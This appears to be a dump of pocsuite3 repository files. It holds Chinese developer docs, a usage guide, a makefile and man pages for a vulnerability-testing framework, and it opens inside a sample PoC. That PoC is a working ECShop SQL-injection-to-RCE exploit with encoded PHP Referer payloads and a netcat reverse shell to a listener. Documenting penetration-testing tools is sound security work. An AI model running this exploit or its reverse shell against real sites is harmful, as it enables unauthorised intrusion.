'45ea207d7a2b68c49582d2d22adf953a' # ECShop 3.x hash\n ]\n\n for echash in echashs:\n payload = ('{0}ads|a:2:{{s:3:\"num\";s:116:\"*/ select 1,0x2720756E696F6E202F2A,3,4,5,'\n '6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10'\n '-- -\";s:2:\"id\";s:10:\"\\' union /*\";}}{0}').format(echash)\n headers = {\"Referer\": payload}\n try:\n resp = requests.get(url, headers=headers)\n if resp and resp.status_code == 200 and \"phpinfo()\" in resp.text:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = url\n result['VerifyInfo']['Referer'] = payload\n break\n except Exception as ex:\n pass\n\n return self.parse_output(result)\n\n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('target is not vulnerable')\n return output\n\n def _attack(self):\n return self._verify()\n\n def _shell(self):\n path = \"user.php\"\n url = urljoin(self.url, path)\n echashs = [\n '554fcae493e564ee0dc75bdf2ebf94ca', # ECShop 2.x hash\n '45ea207d7a2b68c49582d2d22adf953a' # ECShop 3.x hash\n ]\n\n cmd = REVERSE_PAYLOAD.NC.format(get_listener_ip(), get_listener_port())\n phpcode = 'passthru(\"{0}\");'.format(cmd)\n encoded_code = base64.b64encode(phpcode.encode())\n postdata = {\n 'action': 'login',\n 'vulnspy': 'eval/**/(base64_decode({0}));exit;'.format(encoded_code.decode()),\n 'rnd': random_str(10)\n }\n\n for echash in echashs:\n payload = '{0}ads|a:3:{{s:3:\"num\";s:207:\"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--\";s:2:\"id\";s:9:\"'\"'\"' union/*\";s:4:\"name\";s:3:\"ads\";}}{1}'.format(echash, echash)\n headers = {\"Referer\": payload}\n try:\n resp = requests.post(url, data=postdata, headers=headers)\n if resp and resp.status_code == 200 and \"phpinfo()\" in resp.text:\n break\n except ReadTimeout:\n break\n except Exception as ex:\n pass\n\n\nregister_poc(DemoPOC)\n\n```\n\n\nHttpServer Demo:\n\n```python\n\"\"\"\nIf you have issues about development, please read:\nhttps://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md\nfor more about information, plz visit https://pocsuite.org\n\"\"\"\nfrom http.server import SimpleHTTPRequestHandler\n\nfrom pocsuite3.api import Output, POCBase, register_poc\nfrom pocsuite3.api import PHTTPServer\n\n\nclass MyRequestHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n path = self.path\n status = 404\n count = 0\n\n xxe_dtd = '''xxx'''\n if path == \"/xxe_dtd\":\n count = len(xxe_dtd)\n status = 200\n self.send_response(status)\n self.send_header('Content-Type', 'text/html')\n self.send_header('Content-Length', '{}'.format(count))\n self.end_headers()\n self.wfile.write(xxe_dtd.encode())\n return\n self.send_response(status)\n self.send_header('Content-Type', 'text/html')\n self.send_header(\"Content-Length\", \"{}\".format(count))\n self.end_headers()\n\n def do_HEAD(self):\n status = 404\n\n if self.path.endswith('jar'):\n status = 200\n self.send_response(status)\n self.send_header(\"Content-type\", \"text/html\")\n self.send_header(\"Content-Length\", \"0\")\n self.end_headers()\n\n\nclass DemoPOC(POCBase):\n vulID = '' # ssvid\n version = '1.0'\n author = ['seebug']\n vulDate = '2018-03-08'\n createDate = '2018-04-12'\n updateDate = '2018-04-13'\n references = ['']\n name = ''\n appPowerLink = ''\n appName = ''\n appVersion = ''\n vulType = ''\n desc = '''\n '''\n samples = []\n install_requires = ['']\n\n def _verify(self):\n result = {}\n '''Simple http server demo\n default params:\n \t\tbind_ip='0.0.0.0'\n \t\tbind_port=666\n \t\tis_ipv6=False\n \t\tuse_https=False\n \t\tcertfile=os.path.join(paths.POCSUITE_DATA_PATH, 'cacert.pem')\n requestHandler=BaseRequestHandler\n You can write your own handler, default list current directory\n '''\n httpd = PHTTPServer(requestHandler=MyRequestHandler)\n httpd.start()\n\n # Write your code\n return self.parse_output(result)\n\n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('target is not vulnerable')\n return output\n\n _attack = _verify\n\n\nregister_poc(DemoPOC)\n\n```\n\n\n### Pocsuite3 集成调用
\n\nPocsuite3 api 提供了集成调用` pocsuite3` 的全部功能函数,可参见测试用例 `tests/test_import_pocsuite_execute.py`。典型的集成调用方法如下:\n\n```python\nfrom pocsuite3.api import init_pocsuite\nfrom pocsuite3.api import start_pocsuite\nfrom pocsuite3.api import get_results\n\n\ndef run_pocsuite():\n # config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf\n config = {\n 'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'],\n 'poc': ['ecshop_rce', 'ftp_burst']\n }\n \n init_pocsuite(config)\n start_pocsuite()\n result = get_results()\n\n```\n\n### PoC 规范说明
\n\n#### PoC 编号说明
\nPoC 编号 ID 与漏洞 ID 一致.\n\n示例,漏洞库中的漏洞统一采用 “SSV-xxx” 编号的方式,则 PoC 编号为 xxx\n\n\n#### PoC 命名规范
\n\nPoC 命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成 `_`\n文件名不能有特殊字符和大写字母,最后出来的文件名应该像这样:\n\n```\n _1847_seeyon_3_1_login_info_disclosure.py\n```\n#### PoC 第三方模块依赖说明
\nPoC 编写的时候要求尽量不要使用第三方模块,如果必要使用,请在 PoC 的基础信息部分,增加 install_requires 字段,按照以下格式填写依赖的模块名:\n```\ninstall_requires =[str_item_, str_item, …] # 整个字段的值为 list,每个项为一个依赖模块\n```\n\nstr_item 格式:模块名==版本号,模块名为 pip install 安装时的模块名(请不要填写 import 的模块名)\n\n如果遇到安装时模块名与调用时的不一致情况,用 `:` 分割开,例如常见的加密算法库 `pycryptodome`,但是调用是以 `from Crypto.Cipher import AES`,此时就需要如下填写:\n\n```python\ninstall_requires = ['pycryptodome:Crypto']\n```\n\n\n#### PoC 结果返回规范
\n\nresult 为 PoC 返回的结果数据类型,result 返回值要求返回完整的一项,暂不符合 result 字段的情况,放入 extra 字段中,此步骤必须尽可能的保证运行者能够根据信息 复现/理解 漏洞,若果步骤复杂,在取证信息中说明。例如:\n\n```python\n # 返回数据库管理员密码\n result['DBInfo']['Password']='xxxxx'\n # 返回 Webshell 地址\n result['ShellInfo']['URL'] = 'xxxxx'\n # 返回网站管理员用户名\n result['AdminInfo']['Username']='xxxxx'\n```\n\n**extra 字段说明**
\nextra 字段为通用结果字段的补充字段,如果需要返回的内容中不属于通用结果字段,那么可以使用 extra 字段进行赋值。extra 字段为 dict 格式,可自定义 key 进行赋值,如:\n```\nresult['extra' ]['field'] = 'aa'\n```\n\n**特殊字段:** evidence,针对结果中返回取证信息,定义字段名只允许为 evidence,并且只能存储于 extar 字段,即:\n```\nresult['extra' ]['evidence'] = 'aa'\n```\n\n**通用字段说明**
\n```\nresult:[\n { name: 'DBInfo', value:'数据库内容' },\n { name: 'Username', value: '管理员用户名'},\n { name: 'Password', value:'管理员密码' },\n { name: 'Salt', value: '加密盐值'},\n { name: 'Uid', value: '用户ID'},\n { name: 'Groupid', value: '用户组ID'},\n\n { name: 'ShellInfo', value: 'Webshell信息'},\n { name: 'URL', value: 'Webshell地址'},\n { name: 'Content', value: 'Webshell内容'},\n\n { name: 'FileInfo', value: '文件信息'},\n { name: 'Filename', value: '文件名称'},\n { name: 'Content', value: '文件内容'},\n\n { name: 'XSSInfo', value: '跨站脚本信息'},\n { name: 'URL', value: '验证URL'},\n { name: 'Payload', value: '验证Payload'},\n\n { name: 'AdminInfo', value: '管理员信息'},\n { name: 'Uid', value: '管理员ID'},\n { name: 'Username', value: '管理员用户名'},\n { name: 'Password', value: '管理员密码'},\n\n { name: 'Database', value:'数据库信息' },\n { name: 'Hostname', value: '数据库主机名'},\n { name: 'Username', value:'数据库用户名' },\n { name: 'Password', value: '数据库密码'},\n { name: 'DBname', value: '数据库名'},\n\n { name: 'VerifyInfo', value: '验证信息'},\n { name: 'Target', value: '验证host:port'},\n { name: 'URL', value: '验证URL'},\n { name: 'Postdata', value: '验证POST数据'},\n { name: 'Path', value: '网站绝对路径'},\n\n { name: 'SiteAttr', value: '网站服务器信息'},\n { name: 'Process', value: '服务器进程'}\n\n ]\n\n```\n\n\n#### 漏洞类型规范
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
英文名称中文名称缩写
Cross Site Scripting 跨站脚本 xss
Cross Site Request Forgery 跨站请求伪造 csrf
SQL Injection Sql注入 sql-inj
LDAP Injection ldap注入 ldap-inj
Mail Command Injection 邮件命令注入 smtp-inj
Null Byte Injection 空字节注入 null-byte-inj
CRLF Injection CRLF注入 crlf-inj
SSI Injection Ssi注入 ssi-inj
XPath Injection Xpath注入 xpath-inj
XML Injection Xml注入 xml-inj
XQuery Injection Xquery 注入 xquery-inj
Command Execution 命令执行 cmd-exec
Code Execution 代码执行 code-exec
Remote File Inclusion 远程文件包含 rfi
Local File Inclusion 本地文件包含 lfi
Abuse of Functionality 功能函数滥用 func-abuse
Brute Force 暴力破解 brute-force
Buffer Overflow 缓冲区溢出 buffer-overflow
Content Spoofing 内容欺骗 spoofing
Credential Prediction 证书预测 credential-prediction
Session Prediction 会话预测 session-prediction
Denial of Service 拒绝服务 dos
Fingerprinting 指纹识别 finger
Format String 格式化字符串 format-string
HTTP Response Smuggling http响应伪造 http-response-smuggling
HTTP Response Splitting http响应拆分 http-response-splitting
HTTP Request Splitting http请求拆分 http-request-splitting
HTTP Request Smuggling http请求伪造 http-request-smuggling
HTTP Parameter Pollution http参数污染 hpp
Integer Overflows 整数溢出 int-overflow
Predictable Resource Location 可预测资源定位 res-location
Session Fixation 会话固定 session-fixation
URL Redirector Abuse url重定向 redirect
Privilege Escalation 权限提升 privilege-escalation
Resolve Error 解析错误 resolve-error
Arbitrary File Creation 任意文件创建 file-creation
Arbitrary File Download 任意文件下载 file-download
Arbitrary File Deletion 任意文件删除 file-deletion
Arbitrary File Read 任意文件读取 file-read
Backup File Found 备份文件发现 bak-file-found
Database Found 数据库发现 db-found
Directory Listing 目录遍历 dir-listing
Directory Traversal 目录穿越 dir-traversal
File Upload 文件上传 file-upload
Login Bypass 登录绕过 login-bypass
Weak Password 弱密码 weak-pass
Remote Password Change 远程密码修改 remote-pass-change
Code Disclosure 代码泄漏 code-disclosure
Path Disclosure 路径泄漏 path-disclosure
Information Disclosure 信息泄漏 info-disclosure
Security Mode Bypass 安全模式绕过 sec-bypass
Malware 挂马 mal
Black Link 暗链 black-link
Backdoor 后门 backdoor
Insecure Cookie Handling 不安全的Cookie insecure-cookie-handling
Shellcode Shellcode shellcode
Variable Coverage 变量覆盖 variable-coverage
Injecting Malware Codes 恶意代码注入 injecting-malware-codes
Upload Files 文件上传 upload-files
Local Overflow 本地溢出 local-overflow
Path Traversal 目录穿越 path-traversal
Unauthorized Access 未授权访问 unauth-access
Remote Overflow 远程溢出 remote-overflow
Man-in-the-middle 中间人攻击 mitm
Out of Memory 内存溢出 out-of-memory
Buffer Over-read 缓冲区越界读 buffer-over-read
Backup File Found 备份文件泄漏 backup-file-found
Use After Free 释放后使用 uaf
DNS Hijacking DNS劫持 dns-hijacking
Improper Input Validation 不正确的输入校验 improper-input-validation
Universal Cross-site Scripting 通用型XSS uxss
Server-Side Request Forgery 服务器端请求伪造 ssrf
Other 其他 other
\n\n也可以参见[漏洞类型规范](http://seebug.org/category)\n" }, { "path": "docs/USAGE.md", "content": "# This document has stopped maintenance, please move to https://pocsuite.org\n\n# Usage\n\n- **pocsuite**: a cool and hackable command line program\n\n## pocsuite\n\nIt supports three modes:\n\n - ```verify```\n - ```attack```\n - ```shell```\n\nYou can also use ```pocsuite -h``` for more details.\n\n```\nusage: pocsuite [options]\n\noptional arguments:\n -h, --help show this help message and exit\n --version Show program's version number and exit\n --update Update Pocsuite3\n -n, --new Create a PoC template\n -v {0,1,2,3,4,5,6} Verbosity level: 0-6 (default 1)\n\nTarget:\n At least one of these options has to be provided to define the target(s)\n\n -u URL [URL ...], --url URL [URL ...]\n Target URL/CIDR (e.g. \"http://www.site.com/vuln.php?id=1\")\n -f URL_FILE, --file URL_FILE\n Scan multiple targets given in a textual file (one per line)\n -p PORTS, --ports PORTS\n add additional port to each target (e.g. 8080,8443)\n -r POC [POC ...] Load PoC file from local or remote from seebug website\n -k POC_KEYWORD Filter PoC by keyword, e.g. ecshop\n -c CONFIGFILE Load options from a configuration INI file\n\nMode:\n Pocsuite running mode options\n\n --verify Run poc with verify mode\n --attack Run poc with attack mode\n --shell Run poc with shell mode\n\nRequest:\n Network request options\n\n --cookie COOKIE HTTP Cookie header value\n --host HOST HTTP Host header value\n --referer REFERER HTTP Referer header value\n --user-agent AGENT HTTP User-Agent header value (default random)\n --proxy PROXY Use a proxy to connect to the target URL (protocol://host:port)\n --proxy-cred PROXY_CRED\n Proxy authentication credentials (name:password)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 10)\n --retry RETRY Time out retrials times (default 0)\n --delay DELAY Delay between two request of one thread\n --headers HEADERS Extra headers (e.g. \"key1: value1\\nkey2: value2\")\n\nAccount:\n Account options\n\n --ceye-token CEYE_TOKEN\n CEye token\n --oob-server OOB_SERVER\n Interactsh server to use (default \"interact.sh\")\n --oob-token OOB_TOKEN\n Authentication token to connect protected interactsh server\n --seebug-token SEEBUG_TOKEN\n Seebug token\n --zoomeye-token ZOOMEYE_TOKEN\n ZoomEye token\n --shodan-token SHODAN_TOKEN\n Shodan token\n --fofa-user FOFA_USER\n Fofa user\n --fofa-token FOFA_TOKEN\n Fofa token\n --quake-token QUAKE_TOKEN\n Quake token\n --hunter-token HUNTER_TOKEN\n Hunter token\n --censys-uid CENSYS_UID\n Censys uid\n --censys-secret CENSYS_SECRET\n Censys secret\n\nModules:\n Modules options\n\n --dork DORK Zoomeye dork used for search\n --dork-zoomeye DORK_ZOOMEYE\n Zoomeye dork used for search\n --dork-shodan DORK_SHODAN\n Shodan dork used for search\n --dork-fofa DORK_FOFA\n Fofa dork used for search\n --dork-quake DORK_QUAKE\n Quake dork used for search\n --dork-hunter DORK_HUNTER\n Hunter dork used for search\n --dork-censys DORK_CENSYS\n Censys dork used for search\n --max-page MAX_PAGE Max page used in search API\n --search-type SEARCH_TYPE\n search type used in search API, web or host\n --vul-keyword VUL_KEYWORD\n Seebug keyword used for search\n --ssv-id SSVID Seebug SSVID number for target PoC\n --lhost CONNECT_BACK_HOST\n Connect back host for target PoC in shell mode\n --lport CONNECT_BACK_PORT\n Connect back port for target PoC in shell mode\n --tls Enable TLS listener in shell mode\n --comparison Compare popular web search engines\n --dork-b64 Whether dork is in base64 format\n\nOptimization:\n Optimization options\n\n -o OUTPUT_PATH, --output OUTPUT_PATH\n Output file to write (JSON Lines format)\n --plugins PLUGINS Load plugins to execute\n --pocs-path POCS_PATH\n User defined poc scripts path\n --threads THREADS Max number of concurrent network requests (default 150)\n --batch BATCH Automatically choose defaut choice without asking\n --requires Check install_requires\n --quiet Activate quiet mode, working without logger\n --ppt Hiden sensitive information when published to the network\n --pcap use scapy capture flow\n --rule export suricata rules, default export reqeust and response\n --rule-req only export request rule\n --rule-filename RULE_FILENAME\n Specify the name of the export rule file\n\nPoc options:\n definition options for PoC\n\n --options Show all definition options\n\n```\n\n**-f, --file URLFILE**\n\nScan multiple targets given in a textual file\n\n```\n$ pocsuite -r pocs/poc_example.py -f url.txt --verify\n```\n\n> Attack batch processing mode only need to replace the ```--verify``` to ```--attack```.\n\n**-r POCFILE**\n\nPOCFILE can be a file or Seebug SSVID. pocsuite plugin can load poc codes from any where.\n\n\n```\n$ pocsuite -r ssvid-97343 -u http://www.example.com --shell\n```\n\n**--verify**\n\nRun poc with verify mode. PoC(s) will be only used for a vulnerability scanning.\n\n```\n$ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --verify\n```\n\n**--attack**\n\nRun poc with attack mode, PoC(s) will be exploitable, and it may allow hackers/researchers break into labs.\n\n```\n$ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --attack\n```\n\n**--shell**\n\nRun poc with shell mode, PoC will be exploitable, when PoC shellcode successfully executed, pocsuite3 will drop into interactive shell.\n\n```\n$ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --shell\n```\n\n**--threads THREADS**\n\nUsing multiple threads, the default number of threads is 150\n\n```\n$ pocsuite -r pocs/poc_example.py -f url.txt --verify --threads 10\n```\n\n**--dork DORK**\n\nIf you are a [**ZoomEye**](https://www.zoomeye.org/) user, The API is a cool and hackable interface. ex:\n\nSearch redis server with ```port:6379``` and ```redis``` keyword.\n\n\n```\n$ pocsuite --dork 'port:6379' --vul-keyword 'redis' --max-page 2\n\n```\n**--dork-shodan DORK**\n\n If you are a [**Shodan**](https://www.shodan.io/) user, The API is a cool and hackable interface. ex:\n\n Search libssh server with `libssh` keyword.\n\n ```\n pocsuite -r pocs/libssh_auth_bypass.py --dork-shodan libssh --threads 10\n ```\n\n**--dork-fofa DORK**\n\n If you are a [**Fofa**](fofa) user, The API is a cool and hackable interface. ex:\n\n Search web server thinkphp with `body=\"thinkphp\"` keyword.\n\n\n ```\n $ pocsuite -r pocs/check_http_status.py --dork-fofa 'body=\"thinkphp\"' --search-type web --threads 10\n ```\n\n**--dork-quake DORK**\n\n If you are a [**Quake**](quake) user, The API is a cool and hackable interface. ex:\n\n Search web server thinkphp with `app:\"ThinkPHP\"` keyword.\n\n\n ```\n $ pocsuite -r pocs/check_http_status.py --dork-quake 'app:\"ThinkPHP\"' --threads 10\n ```\n\n**--dork-b64**\n\n In order to solve the problem of escaping, use --dork-b64 to tell the program that you are passing in base64 encoded dork.\n \n\n```\n$ pocsuite --dork cG9ydDo2Mzc5 --vul-keyword 'redis' --max-page 2 --dork-b64\n```\n\n**--rule**\n Export suricate rules, default export reqeust and response and The poc directory is /pocs/.\n \n Use the --pocs-path parameter to set the directory where the poc needs to be ruled\n \n```\n$ pocsuite --rule\n```\n\n**--rule-req**\n In some cases, we may only need the request rule, --rule-req only export request rule.\n\n```\n$ pocsuite --rule-req\n```\n\nIf you have good ideas, please show them on your way.\n\n## Example\n\n```\ncli mode\n\n\t# basic usage, use -v to set the log level\n\tpocsuite -u http://example.com -r example.py -v 2\n\n\t# run poc with shell mode\n\tpocsuite -u http://example.com -r example.py -v 2 --shell\n\n\t# search for the target of redis service from ZoomEye and perform batch detection of vulnerabilities. The threads is set to 20\n\tpocsuite -r redis.py --dork service:redis --threads 20\n\n\t# load all poc in the poc directory and save the result as html\n\tpocsuite -u http://example.com --plugins poc_from_pocs,html_report\n\n\t# load the target from the file, and use the poc under the poc directory to scan\n\tpocsuite -f batch.txt --plugins poc_from_pocs,html_report\n\n\t# load CIDR target\n\tpocsuite -u 10.0.0.0/24 -r example.py --plugins target_from_cidr\n\n\t# the custom parameters `command` is implemented in ecshop poc, which can be set from command line options\n\tpocsuite -u http://example.com -r ecshop_rce.py --attack --command \"whoami\"\n\nconsole mode\n poc-console\n```\n" }, { "path": "make.bat", "content": "cd %~dp0\npython3 -m pip install ." }, { "path": "makefile", "content": "SRC_DIR = pocsuite3\nMAKE = make\n\n\n.PHONY: prebuildclean install build pypimeta pypi buildupload test flake8 clean\n\n\nprebuildclean:\n\t@+python -c \"import shutil; shutil.rmtree('build', True)\"\n\t@+python -c \"import shutil; shutil.rmtree('dist', True)\"\n\t@+python -c \"import shutil; shutil.rmtree('pocsuite3.egg-info', True)\"\n\ninstall:\n\tpython3 setup.py install\n\nbuild:\n\t@make prebuildclean\n\tpython3 setup.py sdist --formats=zip bdist_wheel\n\t#python3 setup.py bdist_wininst\n\npypimeta:\n\ttwine register\n\npypi:\n\ttwine upload dist/*\n\nbuildupload:\n\t@make build\n\t#@make pypimeta\n\t@make pypi\n\ntest:\n\ttox --skip-missing-interpreters\n\nflake8:\n\t@+flake8 --max-line-length=120 --exclude .asv,.tox,pocsuite3/thirdparty -j 8 --count --statistics --exit-zero pocsuite3 --ignore E501,F401,F403,W503,W605\n\nclean:\n\trm -rf *.egg-info dist build .tox\n\tfind $(SRC_DIR) tests -type f -name '*.pyc' -delete\n" }, { "path": "manpages/poc-console.1", "content": ".TH POC-CONSOLE \"1\" \"Nov 2022\" \"Manual page for poc-console\"\n.\\\"\n.\\\" Nov 3, 2022\n.\\\" Man page author:\n.\\\" 13ph03nix \n.\\\"\n.SH NAME\n.I poc-console\n\\- console mode of\n.B pocsuite3.\n.SH Legal Disclaimer\npoc-console is part of pocsuite3. Usage of pocsuite3 for attacking targets without prior mutual consent is illegal.\npocsuite3 is for security testing purposes only.\n.SH SYNOPSIS\n.B poc-console\n.SH DESCRIPTION\n.I poc-console is the console mode of pocsuite3.\n.I pocsuite3\nis an open-sourced remote vulnerability testing and proof-of-concept\ndevelopment framework developed by the Knownsec 404 Team. It comes with a\npowerful proof-of-concept engine, many nice features for the ultimate\npenetration testers and security researchers.\n.SH OPTIONS\npoc-console do not have command line options. To see a list of available commands,\nenter help at the console prompt.\n.SH \"SEE ALSO\"\nThe full documentation for\n.B pocsuite3\nis maintained at:\n.br\n.I https://pocsuite.org\n.PP\n.SH VERSION\nThis manual page documents pocsuite3 version 2.0.5\n.SH AUTHOR\n.br\n(c) 2014-present by Knownsec 404 Team\n.br\n<404-team@knownsec.com>\n.LP\nThis program is free software; you may redistribute and/or modify it under\nthe terms of the GNU General Public License as published by the Free\nSoftware Foundation; Version 2 with the clarifications and\nexceptions described below. This guarantees your right to use, modify, and\nredistribute this software under certain conditions. If you wish to embed\npocsuite3 technology into proprietary software, we sell alternative licenses\n(contact 404-team@knownsec.com).\n.PP\nManual page started by 13ph03nix\n\n.PP\n\n" }, { "path": "manpages/pocsuite.1", "content": ".TH POCSUITE \"1\" \"Nov 2022\" \"Manual page for pocsuite\"\n.\\\"\n.\\\" Nov 3, 2022\n.\\\" Man page author:\n.\\\" 13ph03nix \n.\\\"\n.SH NAME\n.I pocsuite3\n\\- open-sourced remote vulnerability testing framework.\n.SH Legal Disclaimer\nUsage of pocsuite3 for attacking targets without prior mutual consent is illegal.\npocsuite3 is for security testing purposes only.\n.SH SYNOPSIS\n.B pocsuite\n\\-h[elp]\n.br\n.B pocsuite\n[options]\n.br\n.SH DESCRIPTION\n.I pocsuite3\nis an open-sourced remote vulnerability testing and proof-of-concept\ndevelopment framework developed by the Knownsec 404 Team. It comes with a\npowerful proof-of-concept engine, many nice features for the ultimate\npenetration testers and security researchers.\n.SH OPTIONS\n.SS \"optional arguments:\"\n.TP\n\\fB\\-h\\fR, \\fB\\-\\-help\\fR\nshow this help message and exit\n.TP\n\\fB\\-\\-version\\fR\nShow program's version number and exit\n.TP\n\\fB\\-\\-update\\fR\nUpdate Pocsuite3\n.TP\n\\fB\\-n\\fR, \\fB\\-\\-new\\fR\nCreate a PoC template\n.TP\n\\fB\\-v\\fR {0,1,2,3,4,5,6}\nVerbosity level: 0\\-6 (default 1)\n.SS \"Target:\"\n.IP\nAt least one of these options has to be provided to define the target(s)\n.TP\n\\fB\\-u\\fR URL [URL ...], \\fB\\-\\-url\\fR URL [URL ...]\nTarget URL/CIDR (e.g. \"http://www.site.com/vuln.php?id=1\")\n.TP\n\\fB\\-f\\fR URL_FILE, \\fB\\-\\-file\\fR URL_FILE\nScan multiple targets given in a textual file (one per line)\n.TP\n\\fB\\-p\\fR PORTS, \\fB\\-\\-ports\\fR PORTS\nadd additional port to each target ([proto:]port, e.g. 8080,https:10000)\n.TP\n\\fB\\-s\\fR\nSkip target's port, only use additional port\n.TP\n\\fB\\-r\\fR POC [POC ...]\nLoad POC file from local or remote from seebug website\n.TP\n\\fB\\-k\\fR POC_KEYWORD\nFilter PoC by keyword, e.g. ecshop\n.TP\n\\fB\\-c\\fR CONFIGFILE\nLoad options from a configuration INI file\n.SS \"Mode:\"\n.IP\nPocsuite running mode options\n.TP\n\\fB\\-\\-verify\\fR\nRun poc with verify mode\n.TP\n\\fB\\-\\-attack\\fR\nRun poc with attack mode\n.TP\n\\fB\\-\\-shell\\fR\nRun poc with shell mode\n.SS \"Request:\"\n.IP\nNetwork request options\n.TP\n\\fB\\-\\-cookie\\fR COOKIE\nHTTP Cookie header value\n.TP\n\\fB\\-\\-host\\fR HOST\nHTTP Host header value\n.TP\n\\fB\\-\\-referer\\fR REFERER\nHTTP Referer header value\n.TP\n\\fB\\-\\-user\\-agent\\fR AGENT\nHTTP User\\-Agent header value (default random)\n.TP\n\\fB\\-\\-proxy\\fR PROXY\nUse a proxy to connect to the target URL (protocol://host:port)\n.TP\n\\fB\\-\\-proxy\\-cred\\fR PROXY_CRED\nProxy authentication credentials (name:password)\n.TP\n\\fB\\-\\-timeout\\fR TIMEOUT\nSeconds to wait before timeout connection (default 10)\n.TP\n\\fB\\-\\-retry\\fR RETRY\nTime out retrials times (default 0)\n.TP\n\\fB\\-\\-delay\\fR DELAY\nDelay between two request of one thread\n.TP\n\\fB\\-\\-headers\\fR HEADERS\nExtra headers (e.g. \"key1: value1\\enkey2: value2\")\n.SS \"Account:\"\n.IP\nAccount options\n.TP\n\\fB\\-\\-ceye\\-token\\fR CEYE_TOKEN\nCEye token\n.TP\n\\fB\\-\\-oob\\-server\\fR OOB_SERVER\nInteractsh server to use (default \"interact.sh\")\n.TP\n\\fB\\-\\-oob\\-token\\fR OOB_TOKEN\nAuthentication token to connect protected interactsh server\n.TP\n\\fB\\-\\-seebug\\-token\\fR SEEBUG_TOKEN\nSeebug token\n.TP\n\\fB\\-\\-zoomeye\\-token\\fR ZOOMEYE_TOKEN\nZoomEye token\n.TP\n\\fB\\-\\-shodan\\-token\\fR SHODAN_TOKEN\nShodan token\n.TP\n\\fB\\-\\-fofa\\-user\\fR FOFA_USER\nfofa user\n.TP\n\\fB\\-\\-fofa\\-token\\fR FOFA_TOKEN\nfofa token\n.TP\n\\fB\\-\\-quake\\-token\\fR QUAKE_TOKEN\nquake token\n.TP\n\\fB\\-\\-hunter\\-token\\fR HUNTER_TOKEN\nhunter token\n.TP\n\\fB\\-\\-censys\\-uid\\fR CENSYS_UID\nCensys uid\n.TP\n\\fB\\-\\-censys\\-secret\\fR CENSYS_SECRET\nCensys secret\n.SS \"Modules:\"\n.IP\nModules options\n.TP\n\\fB\\-\\-dork\\fR DORK\nZoomeye dork used for search\n.TP\n\\fB\\-\\-dork\\-zoomeye\\fR DORK_ZOOMEYE\nZoomeye dork used for search\n.TP\n\\fB\\-\\-dork\\-shodan\\fR DORK_SHODAN\nShodan dork used for search\n.TP\n\\fB\\-\\-dork\\-fofa\\fR DORK_FOFA\nFofa dork used for search\n.TP\n\\fB\\-\\-dork\\-quake\\fR DORK_QUAKE\nQuake dork used for search\n.TP\n\\fB\\-\\-dork\\-hunter\\fR DORK_HUNTER\nHunter dork used for search\n.TP\n\\fB\\-\\-dork\\-censys\\fR DORK_CENSYS\nCensys dork used for search\n.TP\n\\fB\\-\\-max\\-page\\fR MAX_PAGE\nMax page used in search API\n.TP\n\\fB\\-\\-search\\-type\\fR SEARCH_TYPE\nsearch type used in search API, web or host\n.TP\n\\fB\\-\\-vul\\-keyword\\fR VUL_KEYWORD\nSeebug keyword used for search\n.TP\n\\fB\\-\\-ssv\\-id\\fR SSVID\nSeebug SSVID number for target PoC\n.TP\n\\fB\\-\\-lhost\\fR CONNECT_BACK_HOST\nConnect back host for target PoC in shell mode\n.TP\n\\fB\\-\\-lport\\fR CONNECT_BACK_PORT\nConnect back port for target PoC in shell mode\n.TP\n\\fB\\-\\-tls\\fR\nEnable TLS listener in shell mode\n.TP\n\\fB\\-\\-comparison\\fR\nCompare popular web search engines\n.TP\n\\fB\\-\\-dork\\-b64\\fR\nWhether dork is in base64 format\n.SS \"Optimization:\"\n.IP\nOptimization options\n.TP\n\\fB\\-o\\fR OUTPUT_PATH, \\fB\\-\\-output\\fR OUTPUT_PATH\nOutput file to write (JSON Lines format)\n.TP\n\\fB\\-\\-plugins\\fR PLUGINS\nLoad plugins to execute\n.TP\n\\fB\\-\\-pocs\\-path\\fR POCS_PATH\nUser defined poc scripts path\n.TP\n\\fB\\-\\-threads\\fR THREADS\nMax number of concurrent network requests (default 150)\n.TP\n\\fB\\-\\-batch\\fR BATCH\nAutomatically choose defalut choice without asking\n.TP\n\\fB\\-\\-requires\\fR\nCheck install_requires\n.TP\n\\fB\\-\\-quiet\\fR\nActivate quiet mode, working without logger\n.TP\n\\fB\\-\\-ppt\\fR\nHiden sensitive information when published to the\nnetwork\n.TP\n\\fB\\-\\-pcap\\fR\nuse scapy capture flow\n.TP\n\\fB\\-\\-rule\\fR\nexport rules, default export request and response\n.TP\n\\fB\\-\\-rule\\-req\\fR\nonly export request rule\n.TP\n\\fB\\-\\-rule\\-filename\\fR RULE_FILENAME\nSpecify the name of the export rule file\n.TP\n\\fB\\-\\-no\\-check\\fR\nDisable URL protocol correction and honeypot check\n.SS \"Poc options:\"\n.IP\ndefinition options for PoC\n.TP\n\\fB\\-\\-options\\fR\nShow all definition options\n.SH EXAMPLES\n.PP\n.br\nRun poc with verify mode, poc will be only used for vulnerability scanning.\n.PP\n.br\n\\fI% pocsuite -r poc_example.py -u http://example.com/ --verify\\fR\n.PP\n.br\nRun poc with attack mode, and it may allow hackers/researchers break into labs.\n.PP\n.br\n\\fI% pocsuite -r poc_example.py -u http://example.com/ --attack\\fR\n.PP\n.br\nRun poc with shell mode, if executed successfully, pocsuite will drop into interactive 